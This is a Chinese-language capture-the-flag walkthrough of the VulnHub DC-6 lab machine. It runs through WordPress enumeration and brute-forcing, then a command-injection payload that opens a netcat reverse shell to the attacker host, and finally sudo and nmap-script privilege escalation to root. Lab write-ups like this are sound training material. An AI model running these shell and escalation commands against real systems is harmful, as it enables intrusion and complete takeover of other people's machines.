DC系列靶机-DC6

时间:2024-10-25 17:39:25

一,环境的搭建

VM17 官网下载

kali 2023.4版 https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2023.4/

靶场文件 https://download.vulnhub.com/dc/DC-6.zip

二,攻略

首先进行主机发现;

接下来进行端口扫描;

开放了22端口和80端口;

首先进行访问;

页面直接跳转;

想到dc-2;也是这种情况,进行同样的操作;

添加的内容:
192.168.20.148 wordy

这样就可以实现页面的正常访问;

发现是一个word press的CMS;

接下来我们仿照dc-2靶机的操作;

接下来针对word press使用wpscan进行扫描;

wpscan --url http://wordy -e u

拿到了几个用户名;

接下来尝试爆破ssh(由于22端口是开放的);

并未爆破成功,账号密码可能不是ssh;

尝试扫描一下目录;

wordpress的后台登录页面;

用前面拿到的账号爆破;

最后得到一组账号密码;

账号:mark
密码:helpdesk01

登录成功;

这里存在一个命令执行;

构造payload;

127.0.0.1|nc -nv 192.168.20.151 4444 -e /bin/bash

发现输入框对长度有限制;

这里可以使用burp抓包,也可以直接修改前端页面;

kali监听4444端口;

nc -lnvp 4444

连接成功;

python -c "import pty;pty.spawn('/bin/bash')"

在/home目录下的mark用户的根目录下找到一个graham用户的密码;

现在尝试切换用户;

切换成功;

sudo -l
查看该用户可以以root权限执行哪些命令;

这里比较有意思的是graham用户与jens用户类似;

并且可以执行这个脚本:/home/jens/backups.sh

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens ./backups.sh

成功切换到了jens用户;

接着继续查看可以使用root权限执行的命令;

接下来我们可以使用nmap这个命令来提权;

nmap提权(可以上网查找有关的知识点);

echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

其中的TF为一个临时文件;

进行提权:

echo "os.execute('/bin/bash')" > /tmp/shell
sudo nmap --script=/tmp/shell

最后拿到最终的flag;

三,结论

hosts文件优先解析,优先级高于DNS;

暴力破解在某些时候很有用;

根据可执行的脚本文件,获取shell;

nmap提权的方法;

在创建临时文件的时候,一般选择/tmp目录,这个目录对于几乎所有的用户都有权限;